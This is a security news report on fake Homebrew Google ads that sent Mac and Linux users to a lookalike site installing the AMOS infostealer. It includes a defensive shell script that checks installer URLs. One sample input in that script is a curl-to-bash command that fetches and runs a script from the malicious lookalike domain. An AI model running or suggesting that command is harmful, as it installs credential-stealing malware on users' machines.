Fake Homebrew Google ads target Mac users with malware

Hackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets.

The malicious Google ads campaign was spotted by Ryan Chenkie, who warned on X about the risk of malware infection.

The malware used in this campaign is AmosStealer (aka 'Atomic'), an infostealer designed for macOS systems and sold to cybercriminals as a subscription of $1,000/month.

The malware was seen recently in other malvertising campaigns promoting fake Google Meet conferencing pages and is currently the go-to stealer for cybercriminals targeting Apple users.

Targeting Homebrew users

Homebrew is a popular open-source package manager for macOS and Linux, allowing users to install, update, and manage software from the command line.

A malicious Google advertisement displayed the correct Homebrew URL, "brew.sh," tricking even familiar users into clicking it. However, the ad redirected them to a fake Homebrew website hosted at "brewe.sh" instead.

Malvertisers have widely used this URL technique to trick users into clicking on what appears to be the official website for a project or organization.

Upon reaching the site, the visitor is prompted to install Homebrew by pasting a command shown there into the macOS Terminal or a Linux shell prompt. The official Homebrew website provides a similar command to execute to install the legitimate software.

However, when running the command shown by the fake website, it will download and execute malware on the device.
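Because the fake site's install command looks almost identical to the real one, the practical defence is to check where a pasted installer command actually fetches from before running it. The following pre-flight script is an added example, not part of the article or the Homebrew project; it assumes the official installer is served from brew.sh or the Homebrew organisation on GitHub (raw.githubusercontent.com/Homebrew/install/...), and the sample commands at the bottom are constructed, with the lookalike using the "brewe.sh" domain named above.

```shell
#!/bin/sh
# Hosts the genuine Homebrew installer is served from (assumption, see lead-in).
ALLOWED_HOSTS="brew.sh raw.githubusercontent.com github.com"

# Print every URL embedded in the argument, one per line.
extract_urls() {
    printf '%s\n' "$1" | grep -oE 'https?://[^] "'"'"')>|;]+' || true
}

# Return 0 only if every URL in the pasted command uses HTTPS, points at an
# allowed host, and (for GitHub hosts) lives under the Homebrew organisation.
check_install_command() {
    cmd=$1
    urls=$(extract_urls "$cmd")
    [ -n "$urls" ] || { echo "REJECT: no URL found in command"; return 1; }
    status=0
    for url in $urls; do
        scheme=${url%%://*}
        rest=${url#*://}
        host=${rest%%/*}
        case $rest in
            */*) path=/${rest#*/} ;;
            *)   path=/ ;;
        esac
        if [ "$scheme" != "https" ]; then
            echo "REJECT: $url is not HTTPS"; status=1; continue
        fi
        case " $ALLOWED_HOSTS " in
            *" $host "*) ;;
            *) echo "REJECT: $host is not a known Homebrew host (lookalike?)"; status=1; continue ;;
        esac
        case $host in
            raw.githubusercontent.com|github.com)
                case $path in
                    /Homebrew/*) ;;
                    *) echo "REJECT: $url is on GitHub but not under /Homebrew/"; status=1; continue ;;
                esac ;;
        esac
        echo "OK: $url"
    done
    return $status
}

# Constructed samples: the genuine-looking command and the brewe.sh lookalike.
check_install_command '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
check_install_command '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"' || echo "blocked lookalike"
```

The check is an allowlist, so any new legitimate mirror must be added to ALLOWED_HOSTS explicitly; that is the point, since a typo-squatted domain can never pass by accident.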

Security researcher JAMESWT found that the malware dropped in this case [VirusTotal] is Amos, a powerful infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and data stored in web browsers.

Homebrew's project leader, Mike McQuaid, acknowledged that the project is aware of the situation but highlighted that it is beyond its control, criticizing Google for its lack of scrutiny.

“Mac Homebrew Project Leader here. This seems taken down now,” tweeted McQuaid.

“There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good.”

At the time of writing, the malicious ad has been taken down, but the campaign may continue via other redirection domains, so Homebrew users should be wary of sponsored ads for the project.

Unfortunately, malicious ads continue to be a problem in Google Search results for various search terms, even for Google Ads itself.

In that campaign, the threat actors targeted Google advertisers to steal their accounts and run malicious campaigns under the guise of legitimate and verified entities.

To minimize the risk of malware infection, whenever clicking on a link in Google, make sure that you are brought to the official website for a project or company before entering sensitive information or downloading software.

Another safe method is to bookmark the official project websites you need to visit often for sourcing software and use those instead of searching online every time.
